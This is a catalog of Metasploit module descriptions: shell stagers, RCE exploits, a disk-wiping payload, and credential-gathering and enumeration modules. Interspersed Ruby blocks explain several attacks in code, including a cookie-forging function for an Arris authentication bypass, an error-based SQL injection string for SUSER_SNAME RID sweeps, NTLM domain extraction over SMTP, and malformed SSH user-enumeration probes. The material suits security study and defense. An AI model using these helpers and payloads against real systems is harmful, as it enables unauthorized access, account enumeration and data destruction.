Windows Command Shell, Hidden Bind Ipknock TCP Stager
Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP works as an authentication method (you can spoof it with tools like hping). After that you can get your shellcode from any IP. The socket will appear as...
Lexmark MarkVision Enterprise Arbitrary File Upload
This module exploits a code execution flaw in Lexmark MarkVision Enterprise before version 2.1. A directory traversal vulnerability in the GfdFileUploadServlet servlet allows an unauthenticated attacker to upload arbitrary files, including arbitrary JSP code. This module has been tested...
ProjectSend Arbitrary File Upload
This module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user. This module requires Metasploit: https://metasploit.com/download Current...
MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS request, where a domain user may forge a PAC with arbitrary privileges, including Domain Administrator. This module...
Windows Upload/Execute, Hidden Bind TCP Stager
Uploads an executable and runs it (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.
Windows Inject DLL, Hidden Bind TCP Stager
Inject a custom DLL into the exploited process. Listen for a connection from a hidden port and spawn a command shell to the allowed host.
Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
Inject the Meterpreter server DLL via the Reflective DLL Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection from a hidden port and spawn a command shell to the allowed host.
Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
Inject the Meterpreter server DLL (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.
Reflective DLL Injection, Hidden Bind TCP Stager
Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host.
Windows Command Shell, Hidden Bind TCP Stager
Spawn a piped command shell (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.
VNC Server (Reflective Injection), Hidden Bind TCP Stager
Inject a VNC DLL via a reflective loader (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.
i-FTP Schedule Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability in i-Ftp v2.20, caused by a long time value set for scheduled download. By persuading the victim to place a specially-crafted Schedule.xml file in the i-FTP folder, a remote attacker could execute arbitrary code on the system or cau...
BulletProof FTP Client BPS Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability in BulletProof FTP Client 2010, caused by an overly long hostname. By persuading the victim to open a specially-crafted .BPS file, a remote attacker could execute arbitrary code on the system or cause the application to crash.
Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Scanner
This module scans for HTTP servers that appear to be vulnerable to the 'Misfortune Cookie' vulnerability, which affects Allegro Software RomPager versions before 4.34 and can allow attackers to authenticate to the HTTP service as an administrator without providing valid credentials.
Windows Gather Active Directory Users
This module will enumerate user accounts in the default Active Directory (AD) domain and store them in the database. If GROUPMEMBER is set to the DN of a group, this will list the members of that group by performing a recursive/nested search, i.e. it will list users who are members of groups that a...
BMC TrackIt! Unauthenticated Arbitrary User Password Change
This module exploits a flaw in the password reset mechanism in BMC TrackIt! 11.3 and possibly prior versions. If the password reset service is configured to use a domain administrator (which is the recommended configuration), then domain credentials, such as those of the domain Administrator, can be reset.
Kippo SSH Honeypot Detector
This module will detect if an SSH server is running a Kippo honeypot. This is done by issuing unexpected data to the SSH service and checking the response returned for two particular non-standard error messages.
Tuleap PHP Unserialize Code Execution
This module exploits a PHP object injection vulnerability in Tuleap <= 7.6-4 which could be abused to allow authenticated users to execute arbitrary code with the...
JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment
This module uses the DeploymentFileRepository class in the JBoss Application Server to deploy a JSP file which then deploys an arbitrary WAR file.
ActualAnalyzer 'ant' Cookie Command Execution
This module exploits a command execution vulnerability in ActualAnalyzer version 2.81 and prior. The 'aa.php' file allows unauthenticated users to execute arbitrary commands supplied via the 'ant' cookie.
Wordpress Download Manager (download-manager) Unauthenticated File Upload
The WordPress download-manager plugin contains multiple unauthenticated file upload vulnerabilities which were fixed in version 2.7.5.
Powershell Remoting Remote Command Execution
This module uses PowerShell Remoting (TCP 47001) to inject payloads on target machines. If RHOSTS are specified, it will try to resolve the IPs to hostnames; otherwise, use HOSTFILE to supply a list of known hostnames.
Arris VAP2500 tools_command.php Command Execution
Arris VAP2500 access points are vulnerable to OS command injection in the web management portal via the tools_command.php page. Though authentication is required to access this page, it is trivially bypassed by setting the value of a cookie to the MD5 hash of a valid username.
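Why a cookie derived from MD5(username) is not authentication, as an added Ruby sketch that is neither the vendor's code nor the module's: the weak check below is modelled on the description above (anyone who can guess a username such as admin can mint the cookie offline), and the hardened version beside it is an assumed design, not Arris's fix: a random 128-bit session id issued only after a real login, kept server-side, and compared in constant time. The username list is constructed sample data.

```ruby
require 'digest'
require 'securerandom'

# Constructed sample: the accounts the portal knows about.
KNOWN_USERS = %w[admin].freeze

# --- Weak scheme, as described: the cookie is just MD5(username). ---
def weak_cookie_for(username)
  Digest::MD5.hexdigest(username)
end

def weak_is_authenticated?(cookie)
  KNOWN_USERS.any? { |u| cookie == weak_cookie_for(u) }
end

# Attacker side: no credentials needed, only a guess at a valid username.
def forge_weak_cookie(guess = 'admin')
  Digest::MD5.hexdigest(guess)
end

# --- Hardened scheme (assumed design): random session id, server-side state. ---
def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  # Fold every byte difference into one accumulator so the time taken does
  # not depend on where the first mismatch is.
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

class SessionStore
  def initialize
    @sessions = {} # session_id => username
  end

  # Must only be called after the caller has verified the user's credentials.
  def issue(username)
    sid = SecureRandom.hex(16) # 128 bits from the CSPRNG, 32 hex chars
    @sessions[sid] = username
    sid
  end

  def authenticated?(cookie)
    return false unless cookie.is_a?(String) && cookie.bytesize == 32
    @sessions.keys.any? { |sid| constant_time_equal?(sid, cookie) }
  end

  def user_for(cookie)
    authenticated?(cookie) ? @sessions[cookie] : nil
  end
end
```

With the weak scheme, forge_weak_cookie('admin') passes weak_is_authenticated? without any credential ever being presented; with the session store, the same MD5 value is just a 32-character string that was never issued, so it fails, and guessing the username tells the attacker nothing about the token.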
Android 'Towelroot' Futex Requeue Kernel Exploit
This module exploits a bug in futex_requeue in the Linux kernel, using similar techniques to those employed by the towelroot exploit. Any Android device with a kernel built before June 2014 is likely to be vulnerable.
WildFly Directory Traversal
This module exploits a directory traversal vulnerability found in JBoss Undertow, the web server of WildFly 8.1.0.Final, running on port 8080. The vulnerability only affects Windows systems.
ManageEngine NetFlow Analyzer Arbitrary File Download
This module exploits an arbitrary file download vulnerability in CSVServlet on ManageEngine NetFlow Analyzer. This module has been tested on both Windows and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you must escape the backslash with a backslash.
Windows Drive Formatter
This payload formats all mounted disks in Windows (aka ShellcodeOfDeath). After formatting, this payload sets the volume label to the string specified in the VOLUMELABEL option. If the code is unable to access a drive for any reason, it skips the drive and proceeds to the next volume.
Pandora FMS Default Credential / SQLi Remote Code Execution
This module attempts to exploit multiple issues in order to gain remote code execution under Pandora FMS version...
Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
This module can be used to brute-force RIDs associated with the domain of the SQL Server using the SUSER_SNAME function via error-based SQL injection. This is similar to the smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC role (everyone). Information that can ...
Mac OS X IOKit Keyboard Driver Root Privilege Escalation
A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel pointers can also be leaked, allowing a full kASLR bypass. Tested on Mavericks 10.9.5, and should work on previous versions. The issue was...
Windows Active Directory Wordlist Builder
This module will gather information from the default Active Directory (AD) domain and use these words to seed a wordlist. By default it enumerates user accounts to build the wordlist.
Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
This module can be used to brute-force RIDs associated with the domain of the SQL Server using the SUSER_SNAME function. This is similar to the smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC role (everyone). Information that can be enumerated includes Windows...
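How the RID sweep behind both SUSER_SNAME modules above works, as an added Ruby example that is not the modules' code: SUSER_SID('DOMAIN\Administrator') gives the binary SID of a known account, dropping its last sub-authority (the RID) gives the domain SID, and appending candidate RIDs (500 for Administrator, 512 for Domain Admins, 1000 and up for ordinary principals) yields SIDs that SUSER_SNAME() resolves to account names, a call any login in PUBLIC can make. The binary SID layout used here is the standard one (revision, sub-authority count, 48-bit big-endian identifier authority, 32-bit little-endian sub-authorities). The domain SID S-1-5-21-1-2-3 is constructed, and the error-based CONVERT(int, ...) payload is my illustration of the pattern the SQLi variant relies on, not the module's exact injection syntax.

```ruby
# Binary SID <-> "S-1-5-21-..." string, RID handling, and the T-SQL that asks
# SQL Server to resolve each candidate SID.

SID_RE = /\AS-(\d+)-(\d+)((?:-\d+)+)\z/

def sid_from_string(str)
  m = SID_RE.match(str) or raise ArgumentError, "bad SID: #{str}"
  revision  = m[1].to_i
  authority = m[2].to_i
  subauths  = m[3].split('-').reject(&:empty?).map(&:to_i)
  raise ArgumentError, 'too many sub-authorities' if subauths.size > 15
  [revision, subauths.size].pack('CC') +
    [authority >> 32, authority & 0xffffffff].pack('nN') + # 6-byte big-endian authority
    subauths.pack('V*')                                    # each sub-authority little-endian
end

def sid_to_string(bin)
  revision, count = bin.unpack('CC')
  hi, lo = bin[2, 6].unpack('nN')
  subauths = bin[8, 4 * count].to_s.unpack('V*')
  raise ArgumentError, 'truncated SID' unless subauths.size == count
  (['S', revision, (hi << 32) | lo] + subauths).join('-')
end

# Account SID -> domain SID: drop the trailing sub-authority (the RID).
def strip_rid(bin)
  count = bin.getbyte(1)
  raise ArgumentError, 'SID has no RID' if count < 2
  [bin.getbyte(0), count - 1].pack('CC') + bin[2, 6] + bin[8, 4 * (count - 1)]
end

# Domain SID -> account SID for a candidate RID.
def append_rid(bin, rid)
  count = bin.getbyte(1)
  [bin.getbyte(0), count + 1].pack('CC') + bin[2, 6] + bin[8, 4 * count] + [rid].pack('V')
end

# SQL Server accepts a SID as a varbinary literal.
def sid_hex(bin)
  '0x' + bin.unpack1('H*').upcase
end

# Direct query: runs as any PUBLIC login, returns DOMAIN\name or NULL.
def suser_sname_query(bin_sid)
  "SELECT SUSER_SNAME(#{sid_hex(bin_sid)})"
end

# Error-based variant (illustration, not the module's syntax): forcing the
# name through CONVERT(int, ...) makes the server echo it in the error text.
def suser_sname_error_based(bin_sid)
  "' AND 1=CONVERT(int,(SELECT SUSER_SNAME(#{sid_hex(bin_sid)})))--"
end

# Given the SID SUSER_SID() returned for a known account, produce one
# [sid_string, query] pair per candidate RID.
def rid_sweep(known_account_sid_str, rids)
  domain = strip_rid(sid_from_string(known_account_sid_str))
  rids.map do |rid|
    s = append_rid(domain, rid)
    [sid_to_string(s), suser_sname_query(s)]
  end
end
```

In practice the sweep pairs each generated SELECT with the server's answer and keeps the non-NULL ones; RIDs that resolve map straight onto the domain's users and groups, which is exactly the output smb_lookupsid would give over SMB.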
MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution
This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332. The vulnerability is known to affect Internet Explorer 3.0 through 11 on Windows 95 up to Windows 10, and there is no patch for Windows XP. However, this exploit will only target Windows XP and Windows 7 boxes due ...
Gather Kademlia Server Information
This module uses the Kademlia BOOTSTRAP and PING messages to identify and extract information from Kademlia-speaking UDP endpoints, typically belonging to eMule/eDonkey/BitTorrent servers or other P2P applications.
SMTP NTLM Domain Extraction
Extract the Windows domain name from an SMTP NTLM challenge.
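The challenge parsing this module depends on, as an added Ruby example that is not the module's own code: after the client sends `AUTH NTLM <base64 Type 1>`, the server answers with a `334 <base64 Type 2>` continuation line, and that CHALLENGE_MESSAGE carries the NetBIOS and DNS domain and host names in its TargetName field and TargetInfo AV_PAIRs before any credential is presented. Field offsets follow MS-NLMP; the exchange, the names (CORP, MAIL01, corp.example.test), the server challenge and the Version field are constructed sample data, not a capture. The same Type 2 parser applies unchanged to NTLM challenges from HTTP, IMAP or POP3 servers; only the `334` line handling is SMTP-specific.

```ruby
require 'base64'

NTLMSSP_SIGNATURE     = "NTLMSSP\x00".b
NTLMSSP_CHALLENGE     = 2
NEGOTIATE_UNICODE     = 0x00000001
NEGOTIATE_NTLM        = 0x00000200
NEGOTIATE_TARGET_INFO = 0x00800000
NEGOTIATE_VERSION     = 0x02000000

# AV_PAIR ids (MS-NLMP 2.2.2.1) that matter for reconnaissance.
AV_IDS = {
  1 => :nb_computer_name, 2 => :nb_domain_name,
  3 => :dns_computer_name, 4 => :dns_domain_name, 5 => :dns_tree_name
}.freeze

def utf16le(str)
  str.encode('UTF-16LE').force_encoding('BINARY')
end

# Minimal NEGOTIATE (Type 1) message: signature, type, flags, empty domain/workstation fields.
def build_negotiate
  NTLMSSP_SIGNATURE + [1, NEGOTIATE_UNICODE | NEGOTIATE_NTLM].pack('VV') + ("\x00" * 16).b
end

# Constructed CHALLENGE (Type 2) message standing in for a real server reply.
def build_sample_challenge
  target_name = utf16le('CORP')
  pairs = [[2, 'CORP'], [1, 'MAIL01'], [4, 'corp.example.test'], [3, 'mail01.corp.example.test']]
  target_info = pairs.map { |id, v| s = utf16le(v); [id, s.bytesize].pack('vv') + s }.join + [0, 0].pack('vv')
  name_off = 56 # fixed header including the 8-byte Version field
  info_off = name_off + target_name.bytesize
  flags = NEGOTIATE_UNICODE | NEGOTIATE_NTLM | NEGOTIATE_TARGET_INFO | NEGOTIATE_VERSION
  NTLMSSP_SIGNATURE +
    [NTLMSSP_CHALLENGE].pack('V') +
    [target_name.bytesize, target_name.bytesize, name_off].pack('vvV') +   # TargetNameFields
    [flags].pack('V') +
    "\x01\x23\x45\x67\x89\xab\xcd\xef".b +                                 # ServerChallenge (sample)
    ("\x00" * 8).b +                                                       # Reserved
    [target_info.bytesize, target_info.bytesize, info_off].pack('vvV') +   # TargetInfoFields
    [10, 0, 17763, 0, 0, 0, 15].pack('CCvCCCC') +                          # Version (sample)
    target_name + target_info
end

# Decode a CHALLENGE_MESSAGE into the names it leaks.
def parse_ntlm_challenge(msg)
  msg = msg.b
  raise ArgumentError, 'not an NTLMSSP message' unless msg.start_with?(NTLMSSP_SIGNATURE)
  raise ArgumentError, 'message too short' if msg.bytesize < 48
  type = msg[8, 4].unpack1('V')
  raise ArgumentError, "expected CHALLENGE (2), got #{type}" unless type == NTLMSSP_CHALLENGE
  name_len, _max, name_off = msg[12, 8].unpack('vvV')
  flags = msg[20, 4].unpack1('V')
  info_len, _max, info_off = msg[40, 8].unpack('vvV')
  unicode = (flags & NEGOTIATE_UNICODE) != 0
  decode = lambda { |raw| raw.dup.force_encoding(unicode ? 'UTF-16LE' : 'ASCII-8BIT').encode('UTF-8') }
  out = {
    target_name: decode.call(msg[name_off, name_len] || ''),
    server_challenge: msg[24, 8].unpack1('H*'),
    flags: flags
  }
  pos  = info_off
  stop = [info_off + info_len, msg.bytesize].min
  while pos + 4 <= stop
    av_id, av_len = msg[pos, 4].unpack('vv')
    pos += 4
    break if av_id == 0 # MsvAvEOL
    value = msg[pos, av_len] || ''
    pos += av_len
    out[AV_IDS[av_id]] = decode.call(value) if AV_IDS.key?(av_id)
  end
  out
end

# SMTP side: the server's "334 <base64>" reply to AUTH NTLM carries the Type 2 message.
def domain_info_from_smtp_line(line)
  m = /\A334 (\S+)/.match(line.strip)
  raise ArgumentError, "not a 334 continuation: #{line.inspect}" unless m
  parse_ntlm_challenge(Base64.strict_decode64(m[1]))
end

# Constructed exchange; the client cancels with "*" (RFC 4954) once it has the challenge.
def sample_exchange
  [
    "C: AUTH NTLM #{Base64.strict_encode64(build_negotiate)}",
    "S: 334 #{Base64.strict_encode64(build_sample_challenge)}",
    'C: *',
    'S: 501 Authentication aborted'
  ]
end
```

Nothing in the exchange requires a valid account: the Type 1 message carries no credentials, and the server volunteers its domain and host names in the Type 2 reply, which is why this works as unauthenticated reconnaissance.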
Hikvision DVR RTSP Request Remote Code Execution
This module exploits a buffer overflow in the RTSP request parsing code of Hikvision DVR appliances. The Hikvision DVR devices record video feeds of surveillance cameras and offer remote administration and playback of recorded footage. The vulnerability is present in several models / firmware...
Send Cisco Discovery Protocol (CDP) Packets
This module sends Cisco Discovery Protocol (CDP) packets. Note that any responses to the CDP packets broadcast from this module will need to be analyzed with an external packet analysis tool, such as tcpdump or Wireshark, in order to learn more about the Cisco switch and router environment.
Cisco DLSw Information Disclosure Scanner
This module implements the DLSw information disclosure retrieval. There is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains that allows an unauthenticated remote attacker to retrieve the partial contents of packets traversing a Cisco router with DLSw configured and active.
Windows Gather Outlook Email Messages
This module allows reading and searching email messages from the local Outlook installation using PowerShell. Please note that this module manipulates the victim's keyboard/mouse. If a victim is active on the target system, they may notice the activities of this module. Tested on Windows 8.1 x64...
UNIX Gather Remmina Credentials
Post module to obtain credentials saved for RDP and VNC from Remmina's configuration files. These are encrypted with 3DES using a 256-bit secret generated by Remmina, which by design is stored in plaintext in a file that must be properly protected.
Python Meterpreter, Python Reverse HTTP Stager
Run a Meterpreter server in Python (compatible with 2.5-2.7 and 3.1+). Tunnel communication over HTTP.
Java RMI Server Insecure Default Configuration Java Code Execution
This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote HTTP URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both...
MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) allowing arbitrary code execution, bypassing the MS14-060 patch for the vulnerability publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista SP2 all the way to Windows 8,...
Gather Quake Server Information
This module uses the getstatus or getinfo request to obtain information from a Quake server.
Windows Outbound-Filtering Rules
This module performs a kind of TCP traceroute to discover outbound-filtering rules. It will try to make a TCP connection to a certain public IP address (this IP does not need to be under your control) using incrementing TTL values. This way, if you get an answer (an ICMP TTL time exceeded packet) fro...
Samsung Galaxy KNOX Android Browser RCE
A vulnerability exists in the KNOX security component of the Samsung Galaxy firmware that allows a remote webpage to install an APK with arbitrary permissions by abusing the 'smdm://' protocol handler registered by the KNOX component. The vulnerability has been confirmed in the Samsung Galaxy S4,...
Microsoft SQL Server SQLi Escalate Execute AS
This module can be used to escalate privileges via error-based SQL injection if the IMPERSONATE privilege has been assigned to the user. In most cases, this results in additional data access, but in some cases it can be used to gain sysadmin privileges. The syntax for injection URLs is:...
MS14-064 Microsoft Windows OLE Package Manager Code Execution
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) allowing arbitrary code execution, publicly exploited in the wild as an MS14-060 patch bypass. The Microsoft update tried to fix the vulnerability publicly known as "Sandworm". Platforms such as Windows Vista SP2...
SSH Public Key Acceptance Scanner
This module can determine what public keys are configured for key-based authentication across a range of machines, users, and sets of known keys. The SSH protocol indicates whether a particular key is accepted prior to the client performing the actual signed authentication request. To use this...
SSH Username Enumeration
This module uses a malformed packet or timing attack to enumerate users on an OpenSSH server. The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST packet using public key authentication (which must be enabled) to enumerate users. On some versions of OpenSSH under some configurations,...
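The protocol detail both SSH modules above build on, as an added Ruby example that is not the modules' code: RFC 4252 section 7 lets a client send SSH_MSG_USERAUTH_REQUEST with method "publickey" and the has-signature flag FALSE; the server answers SSH_MSG_USERAUTH_PK_OK (60) if it would accept that key for that user and SSH_MSG_USERAUTH_FAILURE (51) otherwise, so every key in an authorized_keys-style list can be tested against every user without signing anything, which is what the acceptance scanner does. The "malformed" variant, which declares a key blob it never sends, is my illustration of what a corrupted request looks like; the module's exact bytes are not on this page. The ed25519 blob of 32 zero bytes and the user "deploy" are constructed. These payloads travel inside the encrypted transport, so a real probe must complete key exchange first (an SSH library's job); this block covers only the user-auth layer and the decoding of the reply.

```ruby
require 'base64'

SSH_MSG_DISCONNECT       = 1
SSH_MSG_USERAUTH_REQUEST = 50
SSH_MSG_USERAUTH_FAILURE = 51
SSH_MSG_USERAUTH_SUCCESS = 52
SSH_MSG_USERAUTH_PK_OK   = 60

# RFC 4251 wire types.
def ssh_string(s)
  [s.bytesize].pack('N') + s.b
end

def ssh_bool(flag)
  [flag ? 1 : 0].pack('C')
end

# Read one length-prefixed string at offset; returns [string, next_offset].
def read_ssh_string(buf, off)
  raise ArgumentError, 'truncated length' if buf.bytesize < off + 4
  len = buf[off, 4].unpack1('N')
  raise ArgumentError, 'truncated string' if buf.bytesize < off + 4 + len
  [buf[off + 4, len], off + 4 + len]
end

# "ssh-ed25519 AAAA... comment" -> [algorithm, raw blob]; the blob's embedded
# algorithm name must agree with the first field or the line is corrupt.
def key_from_authorized_keys_line(line)
  alg, b64 = line.split(' ')
  blob = Base64.strict_decode64(b64)
  embedded, = read_ssh_string(blob, 0)
  raise ArgumentError, "blob says #{embedded}, line says #{alg}" unless embedded == alg
  [alg, blob]
end

# RFC 4252 s.7 query: publickey method, has-signature FALSE. The server
# replies PK_OK if the key is acceptable for the user, FAILURE otherwise.
def pubkey_query(user, alg, blob)
  [SSH_MSG_USERAUTH_REQUEST].pack('C') +
    ssh_string(user) + ssh_string('ssh-connection') + ssh_string('publickey') +
    ssh_bool(false) + ssh_string(alg) + ssh_string(blob)
end

# Illustrative corrupted request: has-signature TRUE and a blob length of
# 0xFFFF with no blob bytes behind it, so any server that gets as far as
# parsing the key fails inside its parser instead of answering normally.
def malformed_pubkey_query(user, alg)
  [SSH_MSG_USERAUTH_REQUEST].pack('C') +
    ssh_string(user) + ssh_string('ssh-connection') + ssh_string('publickey') +
    ssh_bool(true) + ssh_string(alg) + [0xFFFF].pack('N')
end

# Decode the reply payload. nil/empty means the server closed the connection
# without answering, which is itself a signal when probing.
def parse_reply(payload, sent_alg = nil, sent_blob = nil)
  return { status: :dropped } if payload.nil? || payload.empty?
  case payload.getbyte(0)
  when SSH_MSG_USERAUTH_PK_OK
    alg, off = read_ssh_string(payload, 1)
    blob, = read_ssh_string(payload, off)
    { status: :key_accepted, algorithm: alg, echo_matches: alg == sent_alg && blob == sent_blob }
  when SSH_MSG_USERAUTH_FAILURE
    methods, off = read_ssh_string(payload, 1)
    { status: :rejected, methods: methods.split(','), partial: payload.getbyte(off) == 1 }
  when SSH_MSG_USERAUTH_SUCCESS then { status: :authenticated }
  when SSH_MSG_DISCONNECT       then { status: :dropped }
  else { status: :unexpected, type: payload.getbyte(0) }
  end
end

# Constructed sample key (32 zero bytes, not a real key) in authorized_keys form.
SAMPLE_BLOB = ssh_string('ssh-ed25519') + ssh_string(("\x00" * 32).b)
SAMPLE_AUTHORIZED_KEY = "ssh-ed25519 #{Base64.strict_encode64(SAMPLE_BLOB)} deploy@example"
```

The PK_OK reply echoes the algorithm and blob, so echo_matches is the check to keep when several keys are in flight for the same user; a mismatch means the answer belongs to a different probe. For the enumeration case the interesting outcomes are :rejected versus :dropped, since a server that only parses the key for users it recognises behaves differently on the corrupted request depending on whether the user exists.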